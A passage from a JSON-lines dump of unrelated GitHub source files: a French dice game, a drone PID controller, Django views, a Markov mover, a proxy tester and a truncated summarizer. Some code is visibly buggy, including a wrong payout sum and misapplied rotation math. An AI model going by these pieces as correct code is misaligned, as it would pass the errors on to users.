print(utilFunctions.centerText(\"{} donne un score de {} au Cee-Lo !\".format(main,rec_main(main))))\n return(rec_main(main))\n\n\n\n\ndef scoretocoeff(score):\n \"\"\"fonction qui determine le coefficient multiplicateur de la mise en fonction du score\"\"\"\n if score ==13:\t\t#cas Snake Eyes {111}\n return(5)\n elif (score == 12) | (score == 11) | (score == 10) | (score == 9) | (score == 8): #Cas {aaa} sauf a=1\n return(4)\n elif score == 7: #Cas {456}\n return(3)\n elif (score == 6) | (score == 5) | (score == 4) | (score == 3) | (score == 2) | (score == 1): #Cas {AAB}\n return(2)\n else:\t\t\t\t#englobe les cas ou score = 0 {123} (car c'est lors du tirage de cette combinaison sur l'on double la mise)\n return(1)\t\t# et score =-404 (car alors on a juste perdu sa mise, donc *1)\n\n\n\n\n\ndef dealer_turn():\n \"\"\"fonction qui gère le tour du DEALER\"\"\"\n dealerName = utilFunctions.getDealer()\n cashTab = utilFunctions.getCashTab()\n miseTab = utilFunctions.getMiseTab()\n namesList = utilFunctions.getNameListTmp()\n print(utilFunctions.centerText(\"Le dealer : {} joue\".format(dealerName)))\n score_dealer=rec_jeu()\n if score_dealer == 0:\t\t\t\t#Si le dealer tire {123}, il doit doubler la mise de tout les joueurs\n print(utilFunctions.centerText(\"Le dealer {} obtient 1,2,3 ! Il double la mise de tout le monde ! \".format(dealerName)))\n for name in namesList:\n if name == dealerName:\t\t\t#il ne fait rien sur sa mise ( qui est de 0.0 forcement)\n pass\n else:\t\t\t\t\t#et double celle des autres, quitte a passer en négatif\n cashTab[dealerName]-=miseTab[name]\n miseTab[name]*=2\n utilFunctions.setCashTab(cashTab)\n utilFunctions.setMiseTab(miseTab)\n return(score_dealer)\n\n\n\n\n\ndef allTurns(dealerScore):\n \"\"\"fonction qui gère l'affrontement de tous les jouers face au dealer, prend en argument le score du dealer\"\"\"\n nameList = utilFunctions.getNameListTmp()\n dealerName = utilFunctions.getDealer()\n for name in nameList:\n if name == dealerName:\n pass\n else:\n print(utilFunctions.centerText(\"Tour de {}\".format(name)))\n joueurVsDealer(name,dealerScore)\n input()\n utilFunctions.setHeader()\n\n\n\n\n\ndef joueurVsDealer(name,dealerScore):\n \"\"\"fonction qui gère un affrontement entre un joueur et le dealer, prend en argument le numero du joueur actuel et le score du dealer actuel\"\"\"\n cashTab = utilFunctions.getCashTab()\n miseTab = utilFunctions.getMiseTab()\n dealerName = utilFunctions.getDealer()\n joueurScore=rec_jeu() #On tire la main du joueur et on en déduit son score\n print(utilFunctions.centerText(\"{} a obtenu {} !\".format(name,joueurScore)))\n\n if joueurScore==0:\t\t\t\t\t#Si le joueur a tiré {123}, il se voit obligé de doubler sa mise\n print(utilFunctions.centerText(\"Double la mise !\"))\n if (cashTab[name] < miseTab[name]): #Cas ou le joueur ne peut pas doubler sa mise\n miseTab[name]+=cashTab[name]\n cashTab[name] = 0\n else:\t\t\t\t\t\t\t #Cas ou il a assez d'argent pour doubler\n cashTab[name]-=miseTab[name]\n miseTab[name]*=2\n\n if joueurScore < dealerScore:\t\t\t#Cas ou le dealer gagne\n\n print(utilFunctions.centerText(\"{} perd face au dealer, il perd {}*{}, soit {}€ !\".format(name,miseTab[name],scoretocoeff(dealerScore),miseTab[name]*scoretocoeff(dealerScore))))\n dette=miseTab[name]*scoretocoeff(dealerScore) #La dette est la somme que doit payer le joueur au dealer\n if dette > (cashTab[name]+miseTab[name]):\t\t\t\t\t#Si elle est superieure au total (cashtab+mise) du joueur\n cashTab[dealerName]=cashTab[dealerName]+cashTab[dealerName]+miseTab[name] #Le dealer empoche la totalité de l'argent du joueur (cashtab+mise)\n cashTab[name]=0\t\t\t\t\t\t\t\t\t\t\t#et le joueur est a 0 (il ne peut pas être en négatif)\n else:\t\t\t\t\t\t\t\t\t\t\t\t#sinon\n cashTab[name]=(cashTab[name]-dette)+ miseTab[name]\t\t\t\t#le joueur voit son solde déduit de la dette mais récupère sa mise\n cashTab[dealerName]+=dette\t\t\t\t\t\t\t\t\t#le dealer empoche la dette\n\n\n elif joueurScore >dealerScore:\t\t#Cas ou le dealer perd\n\n print(utilFunctions.centerText(\"Le dealer s'écroule face a {}, il perd {}*{}, soit {}€ !\".format(name,miseTab[name],scoretocoeff(joueurScore),miseTab[name]*scoretocoeff(joueurScore))))\n dette=miseTab[name]*scoretocoeff(joueurScore) \t#la dette est la somme que doit le dealer au joueur pour ce tour\n if dette > cashTab[dealerName]:\t\t\t#Cas ou le dealer ne peut rembourser la dette en entier\n if cashTab[dealerName] < 0:\t\t\t\t#Si le dealer est deja endeté\n cashTab[name]+=miseTab[name]\t\t\t\t#le joueur reprend simplement sa mise\n else:\t\t\t\t\t\t\t\t#sinon\n cashTab[name]=cashTab[name]+cashTab[dealerName]+miseTab[name] #Le joueur prend l'integralité du cashtab du dealer et reprend sa mise\n else:\t\t\t\t\t\t\t\t#Cas ou le dealer a suffisamment d'argent pour payer\n cashTab[name]=cashTab[name]+dette+miseTab[name]\t\t\t\t\t#le joueur empoche la dette et reprend sa mise\n cashTab[dealerName]-=dette\t\t\t\t#Dans tous les cas, le dealer s'alourdit de la dette (il peut être en négatif pendant son tour, lui)\n\n\n else:\t\t\t\t\t\t\t\t\t#Cas d'égalité entre le joueur et le dealer\n print(utilFunctions.centerText(\"Egalité, {} reprend sa mise\".format(name)))\n cashTab[name]+=miseTab[name]\t\t\t\t#le joueur reprend sa mise\n\n utilFunctions.setCashTab(cashTab)\n utilFunctions.setMiseTab(miseTab)\n\n\n\ndef fullTurn():\n \"\"\"fonction qui simule un tour de jeu complet, de la mise à l'elimination des perdants\"\"\"\n utilFunctions.setHeader()\n utilFunctions.initMiseTab()\n miseAll()\n dealerScore = dealer_turn()\n allTurns(dealerScore)\n losersElim()\n input()\n\n\ndef losersElim():\n \"\"\"fonction qui gère l'elimination des perdants en fonction de l'argent qui leur reste\"\"\"\n cashTab = utilFunctions.getCashTab()\n miseTab = utilFunctions.getMiseTab()\n listeLosers = []\n for name in cashTab: #recherche des eventuels perdants\n if(cashTab[name] <= 0):\n print(utilFunctions.centerText(\"{} n'a plus d'argent, il est eliminé\".format(name)))\n listeLosers.append(name)\n data = utilFunctions.getData()\n dealerId = data[\"dealerId\"]\n nameList =data[\"namesListTmp\"]\n dealerId = (dealerId+1)%(len(nameList))\n while(nameList[dealerId] in listeLosers): #recherche du nouveau dealer\n dealerId = (dealerId+1)%(len(nameList))\n data['dealerId'] = dealerId\n dealerName = nameList[dealerId]\n data['dealerName'] = dealerName\n for loser in listeLosers: #elimination de tous les perdants\n nameList.remove(loser)\n data['namesListTmp'] = nameList #actualisation de la liste des joueurs actuels\n for i in range (len(nameList)):\n if(nameList[i] == dealerName):\n data[\"dealerId\"] = i\n data['nbPlayersTmp']-=1\n cashTab.pop(loser)\n miseTab.pop(loser)\n utilFunctions.setData(data)\n utilFunctions.setCashTab(cashTab)\n utilFunctions.setMiseTab(miseTab)\n\ndef runNbTurnsGame():\n \"\"\"fonction qui simule une partie en nb tours\"\"\"\n utilFunctions.initCashTab()\n utilFunctions.initMiseTab()\n nbTurns =utilFunctions.getNbTurns()\n data = utilFunctions.getData()\n data['namesListTmp'] = list(data['namesList'])\n data['nbPlayersTmp'] = data['nbPlayers']\n data['dealerId'] = random.randint(0,data['nbPlayers']-1)\n data['dealerName'] = data['namesList'][data['dealerId']]\n utilFunctions.setData(data)\n for i in range(nbTurns):\n fullTurn()\n cashTab = utilFunctions.getCashTab() #on recupère le cashtab après les nb tours\n nameWinner = \"\"\n cashWinner = 0\n for name in cashTab:\n if(cashTab[name] > cashWinner):\n cashWinner = cashTab[name]\n nameWinner = name #le gagnant est le plus riche\n print(utilFunctions.centerText(\"Le gagnant est {}, il a remporté {}€ !\".format(nameWinner,cashWinner)))\n input()\n\ndef runDeathGame():\n \"\"\"fonction qui simule une partie de type match à mort\"\"\"\n utilFunctions.initCashTab()\n utilFunctions.initMiseTab()\n cashTab = utilFunctions.getCashTab()\n data = utilFunctions.getData()\n data['namesListTmp'] = list(data['namesList'])\n data['nbPlayersTmp'] = data['nbPlayers']\n data['dealerId'] = random.randint(0,data['nbPlayers']-1)\n data['dealerName'] = data['namesList'][data['dealerId']]\n utilFunctions.setData(data)\n while(len(cashTab) != 1): #tant qu'il y a plus d'un joueur dans le cashtab\n fullTurn()\n cashTab =utilFunctions.getCashTab()\n for winner in cashTab:\n nameWinner = winner\n cashWinner = cashTab[winner]\n print(utilFunctions.centerText(\"{} est le seul survivant de Cee-Lo, il a gagné {}€\".format(nameWinner,cashWinner)))\n input()\n\n\n#############################################################################\n################ ADVERSARY FUNCTIONS ############################################\n#############################################################################\n\ndef miseAdversary(name):\n \"\"\"fonction qui simule la mise d'un adversaire\"\"\"\n cashTab = utilFunctions.getCashTab()\n miseTab = utilFunctions.getMiseTab()\n sup = cashTab[name]\n mise=random.randint(1,sup)\n cashTab[name] = cashTab[name] - mise\n miseTab[name] = mise\n utilFunctions.setCashTab(cashTab)\n utilFunctions.setMiseTab(miseTab)\n print(utilFunctions.centerText(\"{} mise {}€ !\".format(name, mise)))\n\n\ndef miseAll():\n \"\"\"fonction qui gère la mise de tous les joueurs\"\"\"\n cashTab = utilFunctions.getCashTab()\n playerName = utilFunctions.getPlayerName()\n dealerName = utilFunctions.getDealer()\n\n for name in cashTab:\n if(name == dealerName):\n pass\n else:\n print(utilFunctions.centerText(\"{} est en train de miser\".format(name)))\n if(name == playerName):\n misePlayer()\n else:\n miseAdversary(name)\n input()\n utilFunctions.setHeader()\n\n\n\n\n\n#############################################################################\n################## PLAYER FUNCTIONS ############################################\n#############################################################################\n\ndef misePlayer():\n \"\"\"fonction qui gère la mise du joueur\"\"\"\n playerName = utilFunctions.getPlayerName()\n cashTab = utilFunctions.getCashTab()\n miseTab = utilFunctions.getMiseTab()\n cashMax = cashTab[playerName]\n MISEFLAG = False\n\n while MISEFLAG != True:\n print(utilFunctions.centerText(\"Vous avez {} €\\n\".format(cashMax)))\n mise = utilFunctions.secureInputInt(utilFunctions.centerText(\"Combien souhaitez-vous miser ce tour-ci ?\\n\"))\n if (mise >= 1) & (mise <= cashMax):\n cashTab[playerName] = cashTab[playerName] - mise\n miseTab[playerName] = mise\n utilFunctions.setCashTab(cashTab)\n utilFunctions.setMiseTab(miseTab)\n MISEFLAG=True\n print(utilFunctions.centerText(\"Vous misez {} €\".format(mise)))\n else:\n print(utilFunctions.centerText(\"Vous n'avez pas cette somme\"))\n","repo_name":"SignamarcheixH/Cee-Lo_game","sub_path":"gameFunctions.py","file_name":"gameFunctions.py","file_ext":"py","file_size_in_byte":13626,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21137316500","text":"import math\nimport numpy as np\nimport pybullet as p\nfrom scipy.spatial.transform import Rotation\n\nfrom gym_pybullet_drones.control.BaseControl import BaseControl\nfrom gym_pybullet_drones.envs.BaseAviary import DroneModel, BaseAviary\n\n\nclass CPSControllerDynamics(BaseControl):\n \"\"\"PID control class for Crazyflies.\n\n Based on work conducted at UTIAS' DSL by SiQi Zhou and James Xu.\n\n \"\"\"\n\n ################################################################################\n\n def __init__(self,\n drone_model: DroneModel,\n g: float = 9.8\n ):\n \"\"\"Common control classes __init__ method.\n\n Parameters\n ----------\n drone_model : DroneModel\n The type of drone to control (detailed in an .urdf file in folder `assets`).\n g : float, optional\n The gravitational acceleration in m/s^2.\n\n \"\"\"\n super().__init__(drone_model=drone_model, g=g)\n if self.DRONE_MODEL != DroneModel.CF2X and self.DRONE_MODEL != DroneModel.CF2P:\n print(\"[ERROR] in DSLPIDControl.__init__(), DSLPIDControl requires DroneModel.CF2X or DroneModel.CF2P\")\n exit()\n self.mass = self._getURDFParameter('mass')\n self.arm = self._getURDFParameter('arm')\n self.prop_radius = self._getURDFParameter('prop_radius')\n self.P_COEFF_FOR = np.array([.4, .4, 1.25])\n self.I_COEFF_FOR = np.array([.05, .05, .05])\n self.D_COEFF_FOR = np.array([.2, .2, .5])\n self.P_COEFF_TOR = np.array([70000., 70000., 60000.])\n self.I_COEFF_TOR = np.array([.0, .0, 500.])\n self.D_COEFF_TOR = np.array([20000., 20000., 12000.])\n self.PWM2RPM_SCALE = 0.2685\n self.PWM2RPM_CONST = 4070.3\n self.MIN_PWM = 20000\n self.MAX_PWM = 65535\n if self.DRONE_MODEL == DroneModel.CF2X:\n self.MIXER_MATRIX = np.array([[.5, -.5, -1], [.5, .5, 1], [-.5, .5, -1], [-.5, -.5, 1]])\n elif self.DRONE_MODEL == DroneModel.CF2P:\n self.MIXER_MATRIX = np.array([[0, -1, -1], [+1, 0, 1], [0, 1, -1], [-1, 0, 1]])\n self.reset()\n\n ################################################################################\n\n def reset(self):\n \"\"\"Resets the control classes.\n\n The previous step's and integral errors for both position and attitude are set to zero.\n\n \"\"\"\n super().reset()\n #### Store the last roll, pitch, and yaw ###################\n self.last_rpy = np.zeros(3)\n #### Initialized PID control variables #####################\n self.last_pos_e = np.zeros(3)\n self.integral_pos_e = np.zeros(3)\n self.last_rpy_e = np.zeros(3)\n self.integral_rpy_e = np.zeros(3)\n\n ################################################################################\n\n def computeControl(self,\n control_timestep,\n cur_pos,\n cur_quat,\n cur_vel,\n cur_ang_vel,\n target_pos,\n target_rpy=np.zeros(3),\n target_vel=np.zeros(3),\n target_rpy_rates=np.zeros(3)\n ):\n\n self.control_counter += 1\n thrust, computed_target_rpy, pos_e = self._dslPIDPositionControl(control_timestep,\n cur_pos,\n cur_quat,\n cur_vel,\n target_pos,\n target_rpy,\n target_vel\n )\n rpm = self._dslPIDAttitudeControl(control_timestep,\n thrust,\n cur_quat,\n computed_target_rpy,\n target_rpy_rates\n )\n cur_rpy = p.getEulerFromQuaternion(cur_quat)\n return rpm, pos_e, computed_target_rpy[2] - cur_rpy[2]\n\n ################################################################################\n\n def _dslPIDPositionControl(self,\n control_timestep,\n cur_pos,\n cur_quat,\n cur_vel,\n target_pos,\n target_rpy,\n target_vel\n ):\n \"\"\"DSL's CF2.x PID position control.\n\n Parameters\n ----------\n control_timestep : float\n The time step at which control is computed.\n cur_pos : ndarray\n (3,1)-shaped array of floats containing the current position.\n cur_quat : ndarray\n (4,1)-shaped array of floats containing the current orientation as a quaternion.\n cur_vel : ndarray\n (3,1)-shaped array of floats containing the current velocity.\n target_pos : ndarray\n (3,1)-shaped array of floats containing the desired position.\n target_rpy : ndarray\n (3,1)-shaped array of floats containing the desired orientation as roll, pitch, yaw.\n target_vel : ndarray\n (3,1)-shaped array of floats containing the desired velocity.\n\n Returns\n -------\n float\n The target thrust along the drone z-axis.\n ndarray\n (3,1)-shaped array of floats containing the target roll, pitch, and yaw.\n float\n The current position error.\n\n \"\"\"\n cur_rotation = np.array(p.getMatrixFromQuaternion(cur_quat)).reshape(3, 3)\n pos_e = target_pos - cur_pos\n vel_e = target_vel - cur_vel\n self.integral_pos_e = self.integral_pos_e + pos_e * control_timestep\n self.integral_pos_e = np.clip(self.integral_pos_e, -2., 2.)\n self.integral_pos_e[2] = np.clip(self.integral_pos_e[2], -0.15, .15)\n #### PID target thrust #####################################\n target_thrust = np.multiply(self.P_COEFF_FOR, pos_e) \\\n + np.multiply(self.I_COEFF_FOR, self.integral_pos_e) \\\n + np.multiply(self.D_COEFF_FOR, vel_e) + np.array([0, 0, self.GRAVITY])\n scalar_thrust = max(0., np.dot(target_thrust, cur_rotation[:, 2])) # Projecting thrust onto the drone's current rotation (as a dot product)\n thrust = (math.sqrt(scalar_thrust / (4 * self.KF)) - self.PWM2RPM_CONST) / self.PWM2RPM_SCALE # TODO What square root this?\n\n #### Translation #########\n # Rotation Matrix to Translate from World Frame to Body Frame\n # V' = V @ Rotation\n # Returns 3D Point in Body Frame\n\n # Rotation Matrix to Translate from Body Frame to World Frame\n # V = R^T @ V'\n\n target_thrust = target_thrust / np.linalg.norm(target_thrust)\n roll, pitch, yaw = target_thrust\n R_x = np.array([[1, 0, 0 ],\n [0, np.cos(roll), np.sin(roll)],\n [0, -1.0*np.sin(roll), np.cos(roll)]])\n\n R_y = np.array([[np.cos(pitch), 0, np.sin(pitch)],\n [0, 1, 0 ],\n [-1.0*np.sin(pitch), 0, np.cos(pitch)]])\n\n R_z = np.array([[np.cos(yaw), -1.0*np.sin(yaw), 0],\n [np.sin(yaw), np.cos(yaw), 0],\n [0, 0, 1]])\n\n new_rot = np.cross(R_x, np.cross(R_y, R_z))\n target_euler_pos = (np.transpose(new_rot) @ np.expand_dims(target_thrust, axis=1)).flatten()\n\n ##### Rotation - Our Problem #######\n # Rotation Matrix to Translate from Body Frame to World Frame\n phi, theta, psi = target_rpy\n R_w = np.array([[1, np.sin(phi)*np.tan(theta), np.cos(phi)*np.tan(theta)],\n [0, np.cos(phi), -1.0*np.sin(phi)],\n [0, np.sin(phi)/np.cos(theta),np.cos(phi)/np.cos(theta)]])\n\n target_euler_rot = (R_w @ np.expand_dims(target_rpy, axis=1)).flatten()\n #target_euler_rot = np.array([np.cos(target_rpy[2]), np.sin(target_rpy[2]), 0])\n target_euler_new = target_euler_rot\n\n return thrust, target_euler_new, pos_e\n\n ################################################################################\n\n def _dslPIDAttitudeControl(self,\n control_timestep,\n thrust,\n cur_quat,\n target_euler,\n target_rpy_rates\n ):\n \"\"\"DSL's CF2.x PID attitude control.\n\n Parameters\n ----------\n control_timestep : float\n The time step at which control is computed.\n thrust : float\n The target thrust along the drone z-axis.\n cur_quat : ndarray\n (4,1)-shaped array of floats containing the current orientation as a quaternion.\n target_euler : ndarray\n (3,1)-shaped array of floats containing the computed target Euler angles.\n target_rpy_rates : ndarray\n (3,1)-shaped array of floats containing the desired roll, pitch, and yaw rates.\n\n Returns\n -------\n ndarray\n (4,1)-shaped array of integers containing the RPMs to apply to each of the 4 motors.\n\n \"\"\"\n cur_rotation = np.array(p.getMatrixFromQuaternion(cur_quat)).reshape(3, 3)\n cur_rpy = np.array(p.getEulerFromQuaternion(cur_quat))\n target_quat = (Rotation.from_euler('XYZ', target_euler, degrees=False)).as_quat()\n w, x, y, z = target_quat\n target_rotation = (Rotation.from_quat([w, x, y, z])).as_matrix()\n rot_matrix_e = np.dot((target_rotation.transpose()), cur_rotation) - np.dot(cur_rotation.transpose(),\n target_rotation)\n rot_e = np.array([rot_matrix_e[2, 1], rot_matrix_e[0, 2], rot_matrix_e[1, 0]])\n rpy_rates_e = target_rpy_rates - (cur_rpy - self.last_rpy) / control_timestep\n self.last_rpy = cur_rpy\n self.integral_rpy_e = self.integral_rpy_e - rot_e * control_timestep\n self.integral_rpy_e = np.clip(self.integral_rpy_e, -1500., 1500.)\n self.integral_rpy_e[0:2] = np.clip(self.integral_rpy_e[0:2], -1., 1.)\n #### PID target torques ####################################\n target_torques = - np.multiply(self.P_COEFF_TOR, rot_e) \\\n + np.multiply(self.D_COEFF_TOR, rpy_rates_e) \\\n + np.multiply(self.I_COEFF_TOR, self.integral_rpy_e)\n target_torques = np.clip(target_torques, -3200, 3200)\n pwm = thrust + np.dot(self.MIXER_MATRIX, target_torques)\n pwm = np.clip(pwm, self.MIN_PWM, self.MAX_PWM)\n return self.PWM2RPM_SCALE * pwm + self.PWM2RPM_CONST\n\n ################################################################################\n\n def _one23DInterface(thrust):\n \"\"\"Utility function interfacing 1, 2, or 3D use cases.\n\n Parameters\n ----------\n thrust : ndarray\n Array of floats of length 1, 2, or 4 containing a desired thrust input.\n\n Returns\n -------\n ndarray\n (4,1)-shaped array of integers containing the PWM (not RPMs) to apply to each of the 4 motors.\n\n \"\"\"\n DIM = len(np.array(thrust))\n pwm = np.clip((np.sqrt(np.array(thrust) / (self.KF * (4 / DIM))) - self.PWM2RPM_CONST) / self.PWM2RPM_SCALE,\n self.MIN_PWM, self.MAX_PWM)\n if DIM in [1, 4]:\n return np.repeat(pwm, 4 / DIM)\n elif DIM == 2:\n return np.hstack([pwm, np.flip(pwm)])\n else:\n print(\"[ERROR] in DSLPIDControl._one23DInterface()\")\n exit()\n","repo_name":"MistaMase/513FinalProject","sub_path":"gym-pybullet-drones-1.0.0/CPSControllerDynamics.py","file_name":"CPSControllerDynamics.py","file_ext":"py","file_size_in_byte":12296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70020616808","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .models import Article\nfrom .forms import ArticleForm\nfrom django.contrib.auth.decorators import login_required\n\n# Create your views here.\ndef index(request):\n articles = Article.objects.all()\n context = {\n 'articles': articles,\n }\n return render(request, 'articles/index.html', context)\n\n\ndef create(request):\n return render(request, \"articles/create.html\")\n\n\n@login_required\ndef create(request):\n if request.method == 'POST':\n article_form = ArticleForm(request.POST, request.FILES)\n if article_form.is_valid():\n article = article_form.save(commit=False)\n # 로그인한 유저 => 작성자네!\n article.user = request.user \n article.save()\n messages.success(request, '글 작성이 완료되었습니다.')\n return redirect('articles:index')\n else: \n article_form = ArticleForm()\n context = {\n 'article_form': article_form\n }\n return render(request, 'articles/form.html', context=context)","repo_name":"astroastrum/Django","sub_path":"test_1110/articles/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26606624605","text":"import random\nfrom bisect import bisect\nfrom collections import ChainMap\nfrom typing import Hashable\nfrom .abm import AgentMover\n\nclass CompiledOutcomes():\n def __init__(self, data=None):\n self.outcomes = []\n self.cdf = []\n self.total = 0\n\n if data is not None:\n self.compile(data)\n \n def compile(self, pdict):\n \"\"\"Construct the CDF for the outcome map\"\"\"\n for k,v in pdict.items():\n self.outcomes.append(k)\n self.total += v\n self.cdf.append(self.total)\n\n def weighted_choice(self):\n \"\"\"Provided by Raymond Hettinger on stackoverflow\n O(log(n)) lookup on a compiled CDF object\n \"\"\"\n x = random.random() * self.total\n i = bisect(self.cdf, x)\n return self.outcomes[i]\n\nclass MarkovMover(AgentMover):\n \"\"\"Mapping of movement probabilities of an agent\"\"\"\n\n def __init__(self, *data):\n self.move_probs = ChainMap()\n for datum in data:\n self.add_move_probs(datum)\n\n def __repr__(self):\n return \"AgentMover()\"\n\n def add_move_probs(self, new_map):\n \"\"\"Add a new map onto the front of the chain of lookups of move probs\"\"\"\n compiled_map = {\n key: CompiledOutcomes(value)\n for key, value in new_map.items()\n }\n self.move_probs = self.move_probs.new_child(compiled_map)\n\n def next_location(self, state: Hashable):\n \"\"\"Generate a realisation of the next location an agent in the given state moves to\n \"\"\"\n movement_outcomes = self.move_probs[state]\n return movement_outcomes.weighted_choice()","repo_name":"dwu0042/mkmover","sub_path":"mkmover/markov_mover.py","file_name":"markov_mover.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26677062144","text":"# -*- coding:utf-8 -*-\n# project_xxx\\venv\\Scripts python\n\n'''\nAuthor: Felix\nEmail: xiashubai@gmail.com\nBlog: https://blog.csdn.net/u011318077\nDate: 2019/9/22 19:38\nDesc: 测试ip代理是否有效\n'''\n\nimport requests\nimport time\nfrom requests.exceptions import ProxyError, ConnectionError\nfrom MongoDB.mongo_db import MongoDB\nfrom multiprocessing.pool import ThreadPool\n\n\nclass TestIp():\n\n def test_all(self, proxy_list, method):\n # 进程池中同时最多16个进程,数据库中取出的是所有IP的一个列表\n pool = ThreadPool(16)\n # 向进程池中添加任务\n for proxy in proxy_list:\n pool.apply_async(self.test_one, args=(proxy, method))\n # 关闭进程池,不在接受新的任务\n pool.close()\n # 等待所有子进程结束\n pool.join()\n\n def test_one(self, proxy, method):\n url = 'https://www.baidu.com'\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'\n }\n proxies = {\n 'http': 'http://' + proxy['proxy'],\n 'https': 'http://' + proxy['proxy']\n }\n try:\n start_time = time.time()\n resp = requests.get(url, headers=headers, proxies=proxies, timeout=5, verify=True)\n # 记录ip代理请求用时\n delay = round(time.time() - start_time, 2)\n #\n if resp.status_code == 200:\n # 把delay加入到proxy字典中\n proxy['delay'] = delay\n if method == 'insert':\n # 插入代理到数据库\n MongoDB().insert(proxy)\n elif method == 'check':\n MongoDB().update({'proxy': proxy['proxy']}, {'delay': proxy['delay']})\n else:\n print(\"无效ip:{}\".format(proxy))\n if method == 'check':\n MongoDB().delete({'proxy': proxy['proxy']})\n except (ProxyError, ConnectionError):\n print(\"无效ip:{}\".format(proxy))\n if method == 'check':\n MongoDB().delete({'proxy': proxy['proxy']})\n except Exception:\n # traceback.print_exc()\n pass\n","repo_name":"FelixZFB/ProxiesPool","sub_path":"Crawler/test_proxy.py","file_name":"test_proxy.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40873607090","text":"#!/usr/bin/env python\r\n# ****************************************************************************\r\n# (C) Copyright 2019-2020, PwC\r\n#\r\n# @ Class for text summarization\r\n#\r\n# ****************************************************************************\r\n\r\n# ****************************************************************************\r\n# Imports\r\n# ****************************************************************************\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport warnings\r\nfrom PIL import Image\r\nimport pytesseract\r\nimport sys\r\nfrom pdf2image import convert_from_path\r\nimport os\r\nimport shutil\r\nfrom os.path import isfile, join\r\nfrom tqdm import tqdm\r\nfrom datetime import datetime\r\nfrom nltk.tokenize import sent_tokenize, word_tokenize\r\nimport spacy\r\nimport operator\r\nfrom sklearn.metrics.pairwise import cosine_similarity\r\nimport networkx as nx\r\nimport flask\r\nimport requests\r\nimport ast\r\nimport simplejson as json\r\nfrom nltk.corpus import stopwords\r\nfrom math import ceil\r\nimport re\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem.porter import PorterStemmer\r\nfrom nltk.stem.wordnet import WordNetLemmatizer\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\n\r\nfrom framework.summarizeData.contentSummarizationAbstract import contentSummarizationAbstract\r\nfrom framework.commonConstants import *\r\nfrom framework import commonLog\r\n\r\n\r\n# ****************************************************************************\r\n# Constants\r\n# ****************************************************************************\r\nTEMP = 'temp_'\r\nOUTDIR = 'outDir'\r\nPAGE = 'page_'\r\nDPI = 200\r\nNO_OF_THREADS = 4\r\nMAX_WORD_LENGTH = 45\r\nMAX_VALID_SENTENCE_LENGTH = 200\r\nMIN_VALID_SENTENCE_LENGTH = 6\r\nTESSERACT_PATH = 'C:/Program Files/Tesseract-OCR/tesseract.exe'\r\nspacy_nlp = spacy.load('en_core_web_md')\r\nstop_words = set(stopwords.words(\"english\"))\r\n#encoderURL = 'http://127.0.0.1:5456/encoder'\r\n# ****************************************************************************\r\n# Classes\r\n# ****************************************************************************\r\n\r\n\r\nclass contentSummarization(contentSummarizationAbstract):\r\n \"\"\"docstring for extractContentDataSummarizationClass\"\"\"\r\n\r\n def __init__(self, dataframe, encoderURL):\r\n\r\n \"\"\"\r\n dataframe: dataframe where need to store the extracted texts\r\n downloadPath: path where raw pdf files are stored\r\n pdfDir: directory inside downloadPath\r\n\r\n \"\"\"\r\n self.dataframe = dataframe\r\n self.encoderURL = encoderURL\r\n\r\n def __repr__(self):\r\n return f'{self.__class__.__name__}(dataframe, \\'{self.dataframe}\\', encoderURL, \\'{self.encoderURL}\\')'\r\n\r\n #Most frequently occuring n-grams\r\n def getTopNNgramWords(self, corpus, ngram, n=10):\r\n vec1 = CountVectorizer(ngram_range=(ngram,ngram), max_features=2000).fit(corpus)\r\n bag_of_words = vec1.transform(corpus)\r\n sum_words = bag_of_words.sum(axis=0)\r\n words_freq = [(word, sum_words[0, idx]) for word, idx in vec1.vocabulary_.items()]\r\n words_freq =sorted(words_freq, key = lambda x: x[1], reverse=True)\r\n return words_freq[:n]\r\n\r\n def getKeywords(self, rowName, newRowName, noOfWords=20):\r\n corpus = []\r\n for i in range(0, len(self.dataframe.loc[:, rowName])):\r\n if not pd.isnull(self.dataframe.loc[i, 'Full Content']):\r\n #Remove punctuations\r\n text = re.sub('[^a-zA-Z]', ' ', self.dataframe.loc[i, FULL_CONTENT])\r\n #Convert to lowercase\r\n text = text.lower()\r\n #remove tags\r\n text=re.sub(\"</?.*?>\",\" <> \", text)\r\n # remove special characters and digits\r\n text=re.sub(\"(\\\\d|\\\\W)+\",\" \", text)\r\n ##Convert to list from string\r\n text = text.split()\r\n ##Stemming\r\n ps=PorterStemmer()\r\n #Lemmatisation\r\n lem = WordNetLemmatizer()\r\n text = [lem.lemmatize(word) for word in text if not word in stop_words]\r\n text = [\" \".join(text)]\r\n top1_words = self.getTopNNgramWords(corpus=text, ngram=1, n=noOfWords)\r\n top2_words = self.getTopNNgramWords(corpus=text, ngram=2, n=noOfWords)\r\n top3_words = self.getTopNNgramWords(corpus=text, ngram=3, n=noOfWords)\r\n top4_words = self.getTopNNgramWords(corpus=text, ngram=4, n=noOfWords)\r\n if type(self.dataframe.loc[i, KEYWORDS]) == list:\r\n all_keywords = (list(word[0] for word in top1_words) +\r\n list(word[0] for word in top2_words) +\r\n list(word[0] for word in top3_words) +\r\n list(word[0] for word in top4_words) +\r\n self.dataframe.loc[i, KEYWORDS])\r\n corpus.append(list(set([i for i in all_keywords if not any(set(i) < set(j) for j in all_keywords)])))\r\n else:\r\n all_keywords = (list(word[0] for word in top1_words) +\r\n list(word[0] for word in top2_words) +\r\n list(word[0] for word in top3_words) +\r\n list(word[0] for word in top4_words))\r\n corpus.append(list(set([i for i in all_keywords if not any(set(i) < set(j) for j in all_keywords)])))\r\n else:\r\n corpus.append(np.nan)\r\n self.dataframe[newRowName] = corpus\r\n return 